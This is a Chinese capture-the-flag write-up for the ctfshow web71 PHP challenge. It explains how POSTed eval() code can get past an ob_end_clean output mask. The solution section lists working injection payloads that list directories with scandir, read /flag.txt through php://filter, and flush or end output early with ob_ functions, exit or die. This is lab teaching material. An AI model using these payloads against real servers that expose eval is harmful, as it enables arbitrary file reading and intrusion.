[ctfshow web入门] web71

信息收集

下载index.php并查看

php 复制代码
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

ob_get_contents:可以获取缓冲区中的内容,并将其存储在变量中,以便进一步处理或保存。

ob_end_clean:用于清空输出缓冲区的内容,并关闭输出缓冲。
preg_replace:按照正则表达式替换字符,这里是将0-9 a-z替换成?

没什么用的小知识:

众所周不知,我们输出的时候,比如print是将内容发送到缓冲区的,然后系统会在恰当的时机自动帮我们把缓冲区的内容输出打印。这是我学C++的时候学的,我大胆猜测php原理大致相似。

解题

ob_end_clean删除最上面的输出缓冲区并输出其内容。

那么解题思路是不让他清空,而是让它在清空前打印出来就好了

查看PHP 输出控制函数,看看有什么函数可以利用的

利用php输出控制函数

这几个函数都可以:

php 复制代码
ob_end_flush();
ob_flush();
ob_get_flush();
ob_start();

前三个原理都是提前输出

ob_start是创建一个新的缓冲区,而ob_end_clean()是删除最顶层的输出缓冲区及其所有内容,这刚好删除了最新创建的那个缓冲去的所有内容,保护了之前的那个缓冲区。

s 复制代码
new buffer  --> ob_end_clean
eval($c) buffer
other buffer
......

flag.php显然没有flag,查根目录flag在/flag.txt

php 复制代码
c=var_export(scandir('.'));ob_end_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");ob_flush();
c=var_export(scandir('/'));ob_get_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");ob_start();

解题的截图放在最后

程序提前死亡

只要程序提前死了,那么后续的代码就不会执行了

php 复制代码
c=var_export(scandir('/'));exit();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");die();


这一题的重点在于绕过ob_end_clean删除缓冲区,所以关于读目录和关于读文件的更多方法不再展示,有需要可以观看前面的章节。


web    目录    web

相关推荐
初心w50t218 分钟前
Vue 前端开发性能优化攻略
前端·javascript·vue.js
{⌐■_■}18 分钟前
【软件工程】tob和toc含义理解
前端·数据库·mysql·golang·软件工程·tidb
码农捻旧1 小时前
前端性能优化:从之理论到实践的破局道
前端·性能优化
3Katrina1 小时前
前端面试之防抖节流(一)
前端·javascript·面试
浏览器API调用工程师_Taylor1 小时前
自动化重复任务:从手动操作到效率飞跃
前端·javascript·爬虫
赵润凤1 小时前
Vue 高级视频播放器实现指南
前端
FogLetter2 小时前
从原生JS事件到React事件机制:深入理解前端事件处理
前端·javascript·react.js
小公主2 小时前
如何利用闭包封装私有变量?掌握防抖、节流与 this 问题的巧妙解决方案
前端
烛阴2 小时前
JavaScript 的动态魔法:使用 constructor 动态创建函数
前端·javascript
前端 贾公子2 小时前
tailwind ( uni ) === 自定义主题
前端